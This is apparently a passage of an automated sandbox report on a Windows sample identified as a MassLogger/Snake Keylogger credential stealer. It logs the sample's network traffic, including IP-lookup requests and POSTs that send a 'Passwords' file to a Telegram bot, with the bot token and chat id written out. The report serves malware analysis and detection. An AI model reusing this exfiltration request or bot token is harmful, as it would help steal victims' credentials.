Jan 10, 2025 18:38:14.838180065 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:14.840190887 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:14.840204000 CET	443	49721	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:14.840583086 CET	443	49721	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:14.887243032 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:14.899205923 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:14.939337969 CET	443	49721	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:15.022461891 CET	443	49721	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:15.022540092 CET	443	49721	104.21.64.1	192.168.2.12
Jan 10, 2025 18:38:15.022584915 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:15.025846958 CET	49721	443	192.168.2.12	104.21.64.1
Jan 10, 2025 18:38:20.103250980 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:20.108174086 CET	80	49720	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:20.311512947 CET	80	49720	132.226.247.73	192.168.2.12
Jan 10, 2025 18:38:20.315536022 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:20.315577984 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:20.315655947 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:20.316174030 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:20.316186905 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:20.355973005 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:38:20.931802034 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:20.931978941 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:20.933715105 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:20.933726072 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:20.934133053 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:20.935965061 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:20.979334116 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:20.979480028 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:20.979490042 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:21.385615110 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:21.385746002 CET	443	49722	149.154.167.220	192.168.2.12
Jan 10, 2025 18:38:21.386080980 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:38:21.386691093 CET	49722	443	192.168.2.12	149.154.167.220
Jan 10, 2025 18:39:12.192847967 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:39:12.192964077 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:39:25.311414957 CET	80	49720	132.226.247.73	192.168.2.12
Jan 10, 2025 18:39:25.311561108 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:39:41.700232983 CET	49712	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:39:41.705127001 CET	80	49712	132.226.247.73	192.168.2.12
Jan 10, 2025 18:39:55.028701067 CET	49720	80	192.168.2.12	132.226.247.73
Jan 10, 2025 18:39:55.033667088 CET	80	49720	132.226.247.73	192.168.2.12

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:37:59.766396999 CET	54598	53	192.168.2.12	1.1.1.1
Jan 10, 2025 18:37:59.773997068 CET	53	54598	1.1.1.1	192.168.2.12
Jan 10, 2025 18:38:00.775800943 CET	62687	53	192.168.2.12	1.1.1.1
Jan 10, 2025 18:38:00.783129930 CET	53	62687	1.1.1.1	192.168.2.12
Jan 10, 2025 18:38:07.198223114 CET	55531	53	192.168.2.12	1.1.1.1
Jan 10, 2025 18:38:07.205315113 CET	53	55531	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 18:37:59.766396999 CET	192.168.2.12	1.1.1.1	0x8522	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:00.775800943 CET	192.168.2.12	1.1.1.1	0xd88	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:07.198223114 CET	192.168.2.12	1.1.1.1	0xaa2b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 18:37:59.773997068 CET	1.1.1.1	192.168.2.12	0x8522	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:37:59.773997068 CET	1.1.1.1	192.168.2.12	0x8522	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:37:59.773997068 CET	1.1.1.1	192.168.2.12	0x8522	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:37:59.773997068 CET	1.1.1.1	192.168.2.12	0x8522	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:37:59.773997068 CET	1.1.1.1	192.168.2.12	0x8522	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:37:59.773997068 CET	1.1.1.1	192.168.2.12	0x8522	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:00.783129930 CET	1.1.1.1	192.168.2.12	0xd88	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:00.783129930 CET	1.1.1.1	192.168.2.12	0xd88	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:00.783129930 CET	1.1.1.1	192.168.2.12	0xd88	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:00.783129930 CET	1.1.1.1	192.168.2.12	0xd88	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:00.783129930 CET	1.1.1.1	192.168.2.12	0xd88	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:00.783129930 CET	1.1.1.1	192.168.2.12	0xd88	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:00.783129930 CET	1.1.1.1	192.168.2.12	0xd88	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:38:07.205315113 CET	1.1.1.1	192.168.2.12	0xaa2b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49712	132.226.247.73	80	6180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:37:59.785799980 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:38:00.470386982 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:38:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 18:38:00.474669933 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 18:38:00.685806036 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:38:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 18:38:06.982342005 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 18:38:07.194361925 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:38:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49720	132.226.247.73	80	5048	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:38:13.310791969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 18:38:13.985285044 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:38:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 18:38:14.077166080 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 18:38:14.287674904 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:38:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 18:38:20.103250980 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 18:38:20.311512947 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:38:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49713	104.21.64.1	443	6180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:38:01 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 17:38:01 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:38:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1845470 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2BJ32IXL3o4ILte10h%2FFyfXVagmE1K8Q9KgG4IUOe8E%2Be5V8B7y6G3Oh0WPeNX%2FXuuY1%2FPHrGpFlXqLF3O27QPyK3noMyHAPBSqVB8ScMXtz2JJEtjktjMMNSa35ChgTpWzVfmPx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe70380def42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2961&min_rtt=2689&rtt_var=1552&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=600205&cwnd=240&unsent_bytes=0&cid=bf46d663473e6420&ts=373&x=0"
2025-01-10 17:38:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49714	149.154.167.220	443	6180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:38:07 UTC	295	OUT	POST /bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendDocument?chat_id=7804810800&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3173a1bf16ab Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 17:38:07 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 37 33 61 31 62 66 31 36 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3173a1bf16abContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 17:38:08 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 17:38:08 GMT Content-Type: application/json Content-Length: 514 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 17:38:08 UTC	514	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 31 33 34 37 34 33 35 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 6e 74 69 6f 63 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 41 6e 74 69 6f 63 68 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 38 30 34 38 31 30 38 30 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 6e 74 69 6f 63 68 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 30 36 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 79 70 Data Ascii: {"ok":true,"result":{"message_id":820,"from":{"id":7913474358,"is_bot":true,"first_name":"Antioch","username":"AntiochBot"},"chat":{"id":7804810800,"first_name":"Antioch","type":"private"},"date":1736530688,"document":{"file_name":"Userdata.txt","mime_typ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49721	104.21.64.1	443	5048	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:38:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 17:38:15 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 17:38:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1845484 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vhsjmp0ACWuaND%2FfedZ5q%2BUrkjqybXL3kPTTiIJVvPvM%2BhSWK4sY3mSmkNuGHwo3vHGu%2F3R1BLuim8nbNifguJHPRAnkhO4df9VDrwvdAy%2ByJvBXk26YJKQr%2BJJr8R6qwRAU1GrC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe708b792a7c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2030&min_rtt=2028&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1425781&cwnd=218&unsent_bytes=0&cid=1b925ea82bf461d5&ts=192&x=0"
2025-01-10 17:38:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49722	149.154.167.220	443	5048	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 17:38:20 UTC	295	OUT	POST /bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendDocument?chat_id=7804810800&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3173a990a4cf Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 17:38:20 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 37 33 61 39 39 30 61 34 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3173a990a4cfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 17:38:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 17:38:21 GMT Content-Type: application/json Content-Length: 513 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 17:38:21 UTC	513	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 31 33 34 37 34 33 35 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 6e 74 69 6f 63 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 41 6e 74 69 6f 63 68 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 38 30 34 38 31 30 38 30 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 6e 74 69 6f 63 68 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 30 37 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 79 70 Data Ascii: {"ok":true,"result":{"message_id":821,"from":{"id":7913474358,"is_bot":true,"first_name":"Antioch","username":"AntiochBot"},"chat":{"id":7804810800,"first_name":"Antioch","type":"private"},"date":1736530701,"document":{"file_name":"Userdata.txt","mime_typ

Target ID:	0
Start time:	12:37:52
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\eLo1khn7DQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eLo1khn7DQ.exe"
Imagebase:	0x1f0000
File size:	1'078'272 bytes
MD5 hash:	306ABB19056FCD6A9524D361B1BFF4F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:37:55
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\done\lustring.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\eLo1khn7DQ.exe"
Imagebase:	0xe0000
File size:	1'078'272 bytes
MD5 hash:	306ABB19056FCD6A9524D361B1BFF4F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects 